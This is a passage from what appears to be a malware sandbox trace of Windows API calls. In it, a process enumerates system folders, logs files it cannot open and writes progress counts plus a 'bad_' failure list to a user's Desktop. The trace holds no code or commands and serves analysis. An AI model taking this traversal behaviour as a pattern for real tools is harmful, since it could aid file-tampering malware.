Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\Journal", lpUsedDefaultChar=0x0) returned 16363 [0283.421] WriteFile (in: hFile=0x2cc, lpBuffer=0x24667d8*, nNumberOfBytesToWrite=0x3feb, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x24667d8*, lpNumberOfBytesWritten=0x63fe20*=0x3feb, lpOverlapped=0x0) returned 1 [0283.422] CloseHandle (hObject=0x2cc) returned 1 [0283.422] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=808 / B=44 / T=2891", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0283.422] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=808 / B=44 / T=2891", cchWideChar=39, lpMultiByteStr=0x1fe5354, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=808 / B=44 / T=2891", lpUsedDefaultChar=0x0) returned 39 [0283.422] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x27, lpOverlapped=0x0) returned 1 [0283.424] Sleep (dwMilliseconds=0x5dc) [0284.934] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0285.016] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", cchWideChar=4265, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4265 [0285.016] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", cchWideChar=4265, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4265 [0285.016] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", cchWideChar=4265, lpMultiByteStr=0x1efb068, cbMultiByte=4265, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package 